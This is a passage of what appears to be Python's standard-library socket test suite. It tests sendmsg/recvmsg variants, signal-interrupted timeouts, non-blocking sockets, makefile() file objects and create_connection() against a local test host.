class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
                              SendrecvmsgConnectionlessBase,
                              ThreadedSocketTestMixin, UDP6TestBase):
    # IPv6 UDP variant of SendrecvmsgUDPTestBase.

    def checkRecvmsgAddress(self, addr1, addr2):
        # Called to compare the received address with the address of
        # the peer, ignoring scope ID
        self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
    # sendmsg() tests over IPv6 UDP.
    pass

@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
    # recvmsg() tests over IPv6 UDP.
    pass

@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
    # recvmsg_into() tests over IPv6 UDP.
    pass

@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
                                      SendrecvmsgUDP6TestBase):
    # RFC 3542 ancillary-data tests with recvmsg() over IPv6 UDP.
    pass

@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
                                          RFC3542AncillaryTest,
                                          SendrecvmsgUDP6TestBase):
    # Same as above, but receiving via recvmsg_into().
    pass

class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
                             ConnectedStreamTestMixin, TCPTestBase):
    # Connected-stream base for the TCP sendmsg/recvmsg tests below.
    pass

@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
    # sendmsg() tests over TCP.
    pass

@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
                     SendrecvmsgTCPTestBase):
    # recvmsg() tests over TCP.
    pass

@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
                         SendrecvmsgTCPTestBase):
    # recvmsg_into() tests over TCP.
    pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
                                    SendrecvmsgConnectedBase,
                                    ConnectedStreamTestMixin, SCTPStreamBase):
    # Connected-stream base for the SCTP sendmsg/recvmsg tests below.
    pass

@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
    # sendmsg() tests over SCTP streams.
    pass

@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
                            SendrecvmsgSCTPStreamTestBase):

    def testRecvmsgEOF(self):
        # SCTP may sporadically raise ENOTCONN at EOF instead of
        # returning an empty read; treat that as a skip, not a failure.
        try:
            super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
        except OSError as e:
            if e.errno != errno.ENOTCONN:
                raise
            self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")

@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
                                SendrecvmsgSCTPStreamTestBase):

    def testRecvmsgEOF(self):
        # Same ENOTCONN workaround as RecvmsgSCTPStreamTest above.
        try:
            super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
        except OSError as e:
            if e.errno != errno.ENOTCONN:
                raise
            self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
                                    ConnectedStreamTestMixin, UnixStreamBase):
    # Connected-stream base for the Unix-domain socket tests below.
    pass

@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
    # sendmsg() tests over Unix-domain stream sockets.
    pass

@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
                            SendrecvmsgUnixStreamTestBase):
    # recvmsg() tests over Unix-domain stream sockets.
    pass

@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
                                SendrecvmsgUnixStreamTestBase):
    # recvmsg_into() tests over Unix-domain stream sockets.
    pass

@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
    # SCM_RIGHTS FD-passing tests using recvmsg().
    pass

@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
                                     SendrecvmsgUnixStreamTestBase):
    # SCM_RIGHTS FD-passing tests using recvmsg_into().
    pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
    """Base class for interrupted send/receive tests.

    Installs a SIGALRM handler that raises ZeroDivisionError (so an
    interrupted socket call surfaces as a distinct, easily-asserted
    exception) and removes it on teardown, along with any scheduled
    alarms.
    """

    def setUp(self):
        super().setUp()
        orig_alrm_handler = signal.signal(signal.SIGALRM,
                                          lambda signum, frame: 1 / 0)
        self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)

    # Timeout for socket operations
    timeout = 4.0

    # Provide setAlarm() method to schedule delivery of SIGALRM after
    # given number of seconds, or cancel it if zero, and an
    # appropriate time value to use.  Use setitimer() if available.
    if hasattr(signal, "setitimer"):
        alarm_time = 0.05

        def setAlarm(self, seconds):
            signal.setitimer(signal.ITIMER_REAL, seconds)
    else:
        # Old systems may deliver the alarm up to one second early
        alarm_time = 2

        def setAlarm(self, seconds):
            signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
                     "Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
    """Test interrupting the recv*() methods with signals when a
    timeout is set."""

    def setUp(self):
        super().setUp()
        self.serv.settimeout(self.timeout)

    def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) raises ZeroDivisionError
        # (propagated from the SIGALRM handler installed by the base
        # class) when interrupted by a signal.
        try:
            self.setAlarm(self.alarm_time)
            with self.assertRaises(ZeroDivisionError) as cm:
                func(*args, **kwargs)
        finally:
            self.setAlarm(0)  # always cancel any pending alarm

    def testInterruptedRecvTimeout(self):
        self.checkInterruptedRecv(self.serv.recv, 1024)

    def testInterruptedRecvIntoTimeout(self):
        self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))

    def testInterruptedRecvfromTimeout(self):
        self.checkInterruptedRecv(self.serv.recvfrom, 1024)

    def testInterruptedRecvfromIntoTimeout(self):
        self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))

    @requireAttrs(socket.socket, "recvmsg")
    def testInterruptedRecvmsgTimeout(self):
        self.checkInterruptedRecv(self.serv.recvmsg, 1024)

    @requireAttrs(socket.socket, "recvmsg_into")
    def testInterruptedRecvmsgIntoTimeout(self):
        self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
                     "Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
                                 ThreadSafeCleanupTestCase,
                                 SocketListeningTestMixin, TCPTestBase):
    """Test interrupting the interruptible send*() methods with signals
    when a timeout is set."""

    def setUp(self):
        super().setUp()
        self.serv_conn = self.newSocket()
        self.addCleanup(self.serv_conn.close)
        # Use a thread to complete the connection, but wait for it to
        # terminate before running the test, so that there is only one
        # thread to accept the signal.
        cli_thread = threading.Thread(target=self.doConnect)
        cli_thread.start()
        self.cli_conn, addr = self.serv.accept()
        self.addCleanup(self.cli_conn.close)
        cli_thread.join()
        self.serv_conn.settimeout(self.timeout)

    def doConnect(self):
        # Runs in the helper thread started by setUp().
        self.serv_conn.connect(self.serv_addr)

    def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, raises
        # ZeroDivisionError (propagated from the SIGALRM handler) when
        # interrupted by a signal; looped so repeated sends eventually
        # block and can be interrupted.
        try:
            with self.assertRaises(ZeroDivisionError) as cm:
                while True:
                    self.setAlarm(self.alarm_time)
                    func(*args, **kwargs)
        finally:
            self.setAlarm(0)  # always cancel any pending alarm

    # Issue #12958: The following tests have problems on OS X prior to 10.7
    @support.requires_mac_ver(10, 7)
    def testInterruptedSendTimeout(self):
        self.checkInterruptedSend(self.serv_conn.send, b"a"*512)

    @support.requires_mac_ver(10, 7)
    def testInterruptedSendtoTimeout(self):
        # Passing an actual address here as Python's wrapper for
        # sendto() doesn't allow passing a zero-length one; POSIX
        # requires that the address is ignored since the socket is
        # connection-mode, however.
        self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
                                  self.serv_addr)

    @support.requires_mac_ver(10, 7)
    @requireAttrs(socket.socket, "sendmsg")
    def testInterruptedSendmsgTimeout(self):
        self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
    """Check that closing one end of a TCP connection is observed as
    EOF by the peer, and that repeated close() calls are harmless."""

    def testClose(self):
        conn, addr = self.serv.accept()
        conn.close()

        client_sock = self.cli
        readable, _, _ = select.select([client_sock], [], [], 1.0)
        self.assertEqual(readable, [client_sock])
        # EOF on the peer side is reported as an empty read.
        self.assertEqual(client_sock.recv(1), b'')

        # close() must be idempotent: calling it repeatedly is safe.
        conn.close()
        conn.close()

    def _testClose(self):
        self.cli.connect((HOST, self.port))
        time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
    """Sanity checks for socket.socketpair(): default family, type and
    protocol of both ends, plus a simple send/recv in each direction."""

    def __init__(self, methodName='runTest'):
        SocketPairTest.__init__(self, methodName=methodName)

    def _check_defaults(self, sock):
        self.assertIsInstance(sock, socket.socket)
        # socketpair() uses AF_UNIX where available, AF_INET otherwise.
        if hasattr(socket, 'AF_UNIX'):
            expected_family = socket.AF_UNIX
        else:
            expected_family = socket.AF_INET
        self.assertEqual(sock.family, expected_family)
        self.assertEqual(sock.type, socket.SOCK_STREAM)
        self.assertEqual(sock.proto, 0)

    def _testDefaults(self):
        self._check_defaults(self.cli)

    def testDefaults(self):
        self._check_defaults(self.serv)

    def testRecv(self):
        received = self.serv.recv(1024)
        self.assertEqual(received, MSG)

    def _testRecv(self):
        self.cli.send(MSG)

    def testSend(self):
        self.serv.send(MSG)

    def _testSend(self):
        received = self.cli.recv(1024)
        self.assertEqual(received, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
    """Non-blocking / timeout behaviour on TCP sockets: setblocking(),
    settimeout(), SOCK_NONBLOCK, timeout inheritance across accept(),
    and non-blocking accept()/recv()."""

    def __init__(self, methodName='runTest'):
        # Event used to synchronise the server and client threads.
        self.event = threading.Event()
        ThreadedTCPSocketTest.__init__(self, methodName=methodName)

    def assert_sock_timeout(self, sock, timeout):
        """Assert both the Python-level timeout/blocking state and,
        where fcntl is available, the O_NONBLOCK flag on the fd."""
        self.assertEqual(self.serv.gettimeout(), timeout)

        blocking = (timeout != 0.0)
        self.assertEqual(sock.getblocking(), blocking)

        if fcntl is not None:
            # When a Python socket has a non-zero timeout, it's switched
            # internally to a non-blocking mode. Later, sock.sendall(),
            # sock.recv(), and other socket operations use a select() call and
            # handle EWOULDBLOCK/EGAIN on all socket operations. That's how
            # timeouts are enforced.
            fd_blocking = (timeout is None)
            flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
            self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)

    def testSetBlocking(self):
        # Test setblocking() and settimeout() methods
        self.serv.setblocking(True)
        self.assert_sock_timeout(self.serv, None)

        self.serv.setblocking(False)
        self.assert_sock_timeout(self.serv, 0.0)

        self.serv.settimeout(None)
        self.assert_sock_timeout(self.serv, None)

        self.serv.settimeout(0)
        self.assert_sock_timeout(self.serv, 0)

        self.serv.settimeout(10)
        self.assert_sock_timeout(self.serv, 10)

        self.serv.settimeout(0)
        self.assert_sock_timeout(self.serv, 0)

    def _testSetBlocking(self):
        pass

    @support.cpython_only
    def testSetBlocking_overflow(self):
        # Issue 15989: a flag value that overflows a C unsigned int
        # must still be treated as truthy.
        import _testcapi
        if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
            self.skipTest('needs UINT_MAX < ULONG_MAX')

        self.serv.setblocking(False)
        self.assertEqual(self.serv.gettimeout(), 0.0)

        self.serv.setblocking(_testcapi.UINT_MAX + 1)
        self.assertIsNone(self.serv.gettimeout())

    _testSetBlocking_overflow = support.cpython_only(_testSetBlocking)

    @unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
                         'test needs socket.SOCK_NONBLOCK')
    @support.requires_linux_version(2, 6, 28)
    def testInitNonBlocking(self):
        # create a socket with SOCK_NONBLOCK
        self.serv.close()
        self.serv = socket.socket(socket.AF_INET,
                                  socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
        self.assert_sock_timeout(self.serv, 0)

    def _testInitNonBlocking(self):
        pass

    def testInheritFlagsBlocking(self):
        # bpo-7995: accept() on a listening socket with a timeout and the
        # default timeout is None, the resulting socket must be blocking.
        with socket_setdefaulttimeout(None):
            self.serv.settimeout(10)
            conn, addr = self.serv.accept()
            self.addCleanup(conn.close)
            self.assertIsNone(conn.gettimeout())

    def _testInheritFlagsBlocking(self):
        self.cli.connect((HOST, self.port))

    def testInheritFlagsTimeout(self):
        # bpo-7995: accept() on a listening socket with a timeout and the
        # default timeout is None, the resulting socket must inherit
        # the default timeout.
        default_timeout = 20.0
        with socket_setdefaulttimeout(default_timeout):
            self.serv.settimeout(10)
            conn, addr = self.serv.accept()
            self.addCleanup(conn.close)
            self.assertEqual(conn.gettimeout(), default_timeout)

    def _testInheritFlagsTimeout(self):
        self.cli.connect((HOST, self.port))

    def testAccept(self):
        # Testing non-blocking accept
        self.serv.setblocking(0)

        # connect() didn't start: non-blocking accept() fails
        start_time = time.monotonic()
        with self.assertRaises(BlockingIOError):
            conn, addr = self.serv.accept()
        dt = time.monotonic() - start_time
        self.assertLess(dt, 1.0)

        self.event.set()

        read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
        if self.serv not in read:
            self.fail("Error trying to do accept after select.")

        # connect() completed: non-blocking accept() doesn't block
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        self.assertIsNone(conn.gettimeout())

    def _testAccept(self):
        # don't connect before event is set to check
        # that non-blocking accept() raises BlockingIOError
        self.event.wait()

        self.cli.connect((HOST, self.port))

    def testRecv(self):
        # Testing non-blocking recv
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        conn.setblocking(0)

        # the peer didn't send data yet: non-blocking recv() fails
        with self.assertRaises(BlockingIOError):
            msg = conn.recv(len(MSG))

        self.event.set()

        read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
        if conn not in read:
            self.fail("Error during select call to non-blocking socket.")

        # the peer sent data: non-blocking recv() doesn't block
        msg = conn.recv(len(MSG))
        self.assertEqual(msg, MSG)

    def _testRecv(self):
        self.cli.connect((HOST, self.port))

        # don't send anything before event is set to check
        # that non-blocking recv() raises BlockingIOError
        self.event.wait()

        # send data: recv() will no longer block
        self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
    """Unit tests for the object returned by socket.makefile()

    self.read_file is the io object returned by makefile() on
    the client connection.  You can read from this file to
    get output from the server.

    self.write_file is the io object returned by makefile() on the
    server connection.  You can write to this file to send output
    to the client.
    """

    bufsize = -1 # Use default buffer size
    encoding = 'utf-8'
    errors = 'strict'
    newline = None

    read_mode = 'rb'
    read_msg = MSG
    write_mode = 'wb'
    write_msg = MSG

    def __init__(self, methodName='runTest'):
        SocketConnectedTest.__init__(self, methodName=methodName)

    def setUp(self):
        # Four events coordinate the server and client threads in the
        # non-blocking subtests of the subclasses.
        self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
            threading.Event() for i in range(4)]
        SocketConnectedTest.setUp(self)
        self.read_file = self.cli_conn.makefile(
            self.read_mode, self.bufsize,
            encoding = self.encoding,
            errors = self.errors,
            newline = self.newline)

    def tearDown(self):
        self.serv_finished.set()
        self.read_file.close()
        self.assertTrue(self.read_file.closed)
        self.read_file = None
        SocketConnectedTest.tearDown(self)

    def clientSetUp(self):
        SocketConnectedTest.clientSetUp(self)
        self.write_file = self.serv_conn.makefile(
            self.write_mode, self.bufsize,
            encoding = self.encoding,
            errors = self.errors,
            newline = self.newline)

    def clientTearDown(self):
        self.cli_finished.set()
        self.write_file.close()
        self.assertTrue(self.write_file.closed)
        self.write_file = None
        SocketConnectedTest.clientTearDown(self)

    def testReadAfterTimeout(self):
        # Issue #7322: A file object must disallow further reads
        # after a timeout has occurred.
        self.cli_conn.settimeout(1)
        self.read_file.read(3)
        # First read raises a timeout
        self.assertRaises(socket.timeout, self.read_file.read, 1)
        # Second read is disallowed
        with self.assertRaises(OSError) as ctx:
            self.read_file.read(1)
        self.assertIn("cannot read from timed out object", str(ctx.exception))

    def _testReadAfterTimeout(self):
        # Send only 3 bytes so the server's second read times out.
        self.write_file.write(self.write_msg[0:3])
        self.write_file.flush()
        self.serv_finished.wait()

    def testSmallRead(self):
        # Performing small file read test
        first_seg = self.read_file.read(len(self.read_msg)-3)
        second_seg = self.read_file.read(3)
        msg = first_seg + second_seg
        self.assertEqual(msg, self.read_msg)

    def _testSmallRead(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()

    def testFullRead(self):
        # read until EOF
        msg = self.read_file.read()
        self.assertEqual(msg, self.read_msg)

    def _testFullRead(self):
        self.write_file.write(self.write_msg)
        # Closing the writer produces EOF on the reading side.
        self.write_file.close()

    def testUnbufferedRead(self):
        # Performing unbuffered file read test: one byte at a time.
        buf = type(self.read_msg)()
        while 1:
            char = self.read_file.read(1)
            if not char:
                break
            buf += char
        self.assertEqual(buf, self.read_msg)

    def _testUnbufferedRead(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()

    def testReadline(self):
        # Performing file readline test
        line = self.read_file.readline()
        self.assertEqual(line, self.read_msg)

    def _testReadline(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()

    def testCloseAfterMakefile(self):
        # The file returned by makefile should keep the socket open.
        self.cli_conn.close()
        # read until EOF
        msg = self.read_file.read()
        self.assertEqual(msg, self.read_msg)

    def _testCloseAfterMakefile(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()

    def testMakefileAfterMakefileClose(self):
        # Closing the file object must leave the socket itself usable.
        self.read_file.close()
        msg = self.cli_conn.recv(len(MSG))
        if isinstance(self.read_msg, str):
            msg = msg.decode()
        self.assertEqual(msg, self.read_msg)

    def _testMakefileAfterMakefileClose(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()

    def testClosedAttr(self):
        self.assertTrue(not self.read_file.closed)

    def _testClosedAttr(self):
        self.assertTrue(not self.write_file.closed)

    def testAttributes(self):
        self.assertEqual(self.read_file.mode, self.read_mode)
        self.assertEqual(self.read_file.name, self.cli_conn.fileno())

    def _testAttributes(self):
        self.assertEqual(self.write_file.mode, self.write_mode)
        self.assertEqual(self.write_file.name, self.serv_conn.fileno())

    def testRealClose(self):
        self.read_file.close()
        self.assertRaises(ValueError, self.read_file.fileno)
        self.cli_conn.close()
        self.assertRaises(OSError, self.cli_conn.getsockname)

    def _testRealClose(self):
        pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):

    """Repeat the tests from FileObjectClassTestCase with bufsize==0.

    In this case (and in this case only), it should be possible to
    create a file object, read a line from it, create another file
    object, read another line from it, without loss of data in the
    first file object's buffer.  Note that http.client relies on this
    when reading multiple requests from the same socket."""

    bufsize = 0 # Use unbuffered mode

    def testUnbufferedReadline(self):
        # Read a line, create a new file object, read another line with it
        line = self.read_file.readline() # first line
        self.assertEqual(line, b"A. " + self.write_msg) # first line
        self.read_file = self.cli_conn.makefile('rb', 0)
        line = self.read_file.readline() # second line
        self.assertEqual(line, b"B. " + self.write_msg) # second line

    def _testUnbufferedReadline(self):
        self.write_file.write(b"A. " + self.write_msg)
        self.write_file.write(b"B. " + self.write_msg)
        self.write_file.flush()

    def testMakefileClose(self):
        # The file returned by makefile should keep the socket open...
        self.cli_conn.close()
        msg = self.cli_conn.recv(1024)
        self.assertEqual(msg, self.read_msg)
        # ...until the file is itself closed
        self.read_file.close()
        self.assertRaises(OSError, self.cli_conn.recv, 1024)

    def _testMakefileClose(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()

    def testMakefileCloseSocketDestroy(self):
        # Closing the file object must drop its reference to the socket.
        refcount_before = sys.getrefcount(self.cli_conn)
        self.read_file.close()
        refcount_after = sys.getrefcount(self.cli_conn)
        self.assertEqual(refcount_before - 1, refcount_after)

    def _testMakefileCloseSocketDestroy(self):
        pass

    # Non-blocking ops
    # NOTE: to set `read_file` as non-blocking, we must call
    # `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).

    def testSmallReadNonBlocking(self):
        self.cli_conn.setblocking(False)
        # No data has been sent yet: non-blocking reads return None.
        self.assertEqual(self.read_file.readinto(bytearray(10)), None)
        self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
        self.evt1.set()
        self.evt2.wait(1.0)
        first_seg = self.read_file.read(len(self.read_msg) - 3)
        if first_seg is None:
            # Data not arrived (can happen under Windows), wait a bit
            time.sleep(0.5)
            first_seg = self.read_file.read(len(self.read_msg) - 3)
        buf = bytearray(10)
        n = self.read_file.readinto(buf)
        self.assertEqual(n, 3)
        msg = first_seg + buf[:n]
        self.assertEqual(msg, self.read_msg)
        # Everything was consumed: further reads return None again.
        self.assertEqual(self.read_file.readinto(bytearray(16)), None)
        self.assertEqual(self.read_file.read(1), None)

    def _testSmallReadNonBlocking(self):
        self.evt1.wait(1.0)
        self.write_file.write(self.write_msg)
        self.write_file.flush()
        self.evt2.set()
        # Avoid closing the socket before the server test has finished,
        # otherwise system recv() will return 0 instead of EWOULDBLOCK.
        self.serv_finished.wait(5.0)

    def testWriteNonBlocking(self):
        self.cli_finished.wait(5.0)
        # The client thread can't skip directly - the SkipTest exception
        # would appear as a failure.
        if self.serv_skipped:
            self.skipTest(self.serv_skipped)

    def _testWriteNonBlocking(self):
        self.serv_skipped = None
        self.serv_conn.setblocking(False)
        # Try to saturate the socket buffer pipe with repeated large writes.
        BIG = b"x" * support.SOCK_MAX_SIZE
        LIMIT = 10
        # The first write() succeeds since a chunk of data can be buffered
        n = self.write_file.write(BIG)
        self.assertGreater(n, 0)
        for i in range(LIMIT):
            n = self.write_file.write(BIG)
            if n is None:
                # Succeeded
                break
            self.assertGreater(n, 0)
        else:
            # Let us know that this test didn't manage to establish
            # the expected conditions. This is not a failure in itself but,
            # if it happens repeatedly, the test should be fixed.
            self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
    """Repeat the makefile() tests with bufsize==1."""
    bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
    """Repeat the makefile() tests with a tiny buffer size."""
    bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
    """Tests for socket.makefile() in text mode (rather than binary)"""
    # Text-mode reader paired with a binary-mode writer.
    read_mode = 'r'
    read_msg = MSG.decode('utf-8')
    write_mode = 'wb'
    write_msg = MSG
    newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
    """Tests for socket.makefile() in text mode (rather than binary)"""
    # Binary-mode reader paired with a text-mode writer.
    read_mode = 'rb'
    read_msg = MSG
    write_mode = 'w'
    write_msg = MSG.decode('utf-8')
    newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
    """Tests for socket.makefile() in text mode (rather than binary)"""
    # Both ends in text mode.
    read_mode = 'r'
    read_msg = MSG.decode('utf-8')
    write_mode = 'w'
    write_msg = MSG.decode('utf-8')
    newline = ''
class NetworkConnectionTest(object):
    """Prove network connection."""

    def clientSetUp(self):
        # We're inherited below by BasicTCPTest2, which also inherits
        # BasicTCPTest, which defines self.port referenced below.
        self.cli = socket.create_connection((HOST, self.port))
        self.serv_conn = self.cli
# Re-runs every BasicTCPTest case, with the client socket created via
# socket.create_connection() (NetworkConnectionTest.clientSetUp).
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
    """Tests that NetworkConnection does not break existing TCP functionality.
    """
class NetworkConnectionNoServer(unittest.TestCase):
    """Behaviour of connect()/create_connection() when no server is
    listening on the target port."""

    class MockSocket(socket.socket):
        # Stand-in socket class whose connect() always times out.
        def connect(self, *args):
            raise socket.timeout('timed out')

    @contextlib.contextmanager
    def mocked_socket_module(self):
        """Return a socket which times out on connect"""
        old_socket = socket.socket
        socket.socket = self.MockSocket
        try:
            yield
        finally:
            socket.socket = old_socket

    def test_connect(self):
        port = support.find_unused_port()
        cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.addCleanup(cli.close)
        with self.assertRaises(OSError) as cm:
            cli.connect((HOST, port))
        self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)

    def test_create_connection(self):
        # Issue #9792: errors raised by create_connection() should have
        # a proper errno attribute.
        port = support.find_unused_port()
        with self.assertRaises(OSError) as cm:
            socket.create_connection((HOST, port))

        # Issue #16257: create_connection() calls getaddrinfo() against
        # 'localhost'.  This may result in an IPV6 addr being returned
        # as well as an IPV4 one:
        #   >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
        #   >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
        #        (26, 2, 0, '', ('::1', 41230, 0, 0))]
        #
        # create_connection() enumerates through all the addresses returned
        # and if it doesn't successfully bind to any of them, it propagates
        # the last exception it encountered.
        #
        # On Solaris, ENETUNREACH is returned in this circumstance instead
        # of ECONNREFUSED.  So, if that errno exists, add it to our list of
        # expected errnos.
        expected_errnos = support.get_socket_conn_refused_errs()
        self.assertIn(cm.exception.errno, expected_errnos)

    def test_create_connection_timeout(self):
        # Issue #9792: create_connection() should not recast timeout errors
        # as generic socket errors.
        with self.mocked_socket_module():
            try:
                socket.create_connection((HOST, 1234))
            except socket.timeout:
                pass
            except OSError as exc:
                # Without IPv6 a getaddrinfo()-level EAFNOSUPPORT may
                # occur before the mocked connect() is even reached;
                # anything else is a real failure.
                if support.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
                    raise
            else:
                self.fail('socket.timeout not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
    """Attributes (family, source address, timeout) of sockets created
    by socket.create_connection()."""

    def __init__(self, methodName='runTest'):
        SocketTCPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        self.source_port = support.find_unused_port()

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)

    def _justAccept(self):
        # Server side for all cases below: accept one connection and
        # drop it immediately; the assertions run on the client side.
        conn, addr = self.serv.accept()
        conn.close()

    testFamily = _justAccept
    def _testFamily(self):
        self.cli = socket.create_connection((HOST, self.port), timeout=30)
        self.addCleanup(self.cli.close)
        self.assertEqual(self.cli.family, 2)  # 2 == AF_INET

    testSourceAddress = _justAccept
    def _testSourceAddress(self):
        self.cli = socket.create_connection((HOST, self.port), timeout=30,
                source_address=('', self.source_port))
        self.addCleanup(self.cli.close)
        self.assertEqual(self.cli.getsockname()[1], self.source_port)
        # The port number being used is sufficient to show that the bind()
        # call happened.

    testTimeoutDefault = _justAccept
